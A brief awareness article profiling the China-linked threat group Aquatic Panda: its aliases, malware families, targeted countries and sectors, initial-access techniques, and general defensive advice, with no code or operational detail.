As cyber threats continue to evolve, you might want to pay attention to Aquatic Panda, a China-linked advanced persistent threat (APT) group that’s been active since at least 2019. Known by several aliases such as Bronze University and Earth Lusca, this group operates under the Winnti Group umbrella and is funded by Chinese intelligence. Their primary focus? Espionage and intelligence collection against a variety of global targets, including governments and NGOs.
Aquatic Panda employs a suite of sophisticated malware strains to carry out their operations. One of the most common is ShadowPad, a versatile implant also associated with other China-aligned actors. Another significant tool in their arsenal is SodaMaster, which was originally linked to APT10 but has since spread among multiple groups. They also utilize Spyder and RPipeCommander, the latter being a reverse shell specifically deployed against governmental organizations. Then there’s ScatterBee, a loader that drops additional malware onto infected systems. Each of these tools serves a particular purpose, contributing to their overall espionage objectives.
Aquatic Panda utilizes advanced malware like ShadowPad and SodaMaster to enhance their espionage operations.
Geographically, Aquatic Panda’s reach spans numerous countries, including Taiwan, Hungary, Turkey, Thailand, France, and the United States. Their recent Operation FishMedley showcased their capability, targeting seven organizations over ten months, including Catholic charities and non-governmental organizations. This highlights their focus on sectors that often hold sensitive information and influence. Additionally, their primary objective is to access intellectual property related to telecom and technology sectors.
The techniques and tactics employed by Aquatic Panda are equally concerning. They exploit vulnerabilities like DNS poisoning and Log4Shell to gain initial access, although the exact methods can be elusive. Once inside, they use implants for data theft and reconnaissance, employing tools like Cobalt Strike for remote access. Their evasion strategies are sophisticated, often utilizing native OS binaries to avoid detection.
In response to these persistent threats, various law enforcement agencies have managed to disrupt some of Aquatic Panda’s attacks. However, organizations must remain vigilant, patching vulnerabilities and continuously monitoring their systems to detect potential breaches early. International cooperation is crucial in combating such threats, as is public awareness. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued advisories to alert businesses about the risks posed by Aquatic Panda and similar groups.
In a world where cyber threats are becoming increasingly complex, staying informed about groups like Aquatic Panda can be your first line of defense.
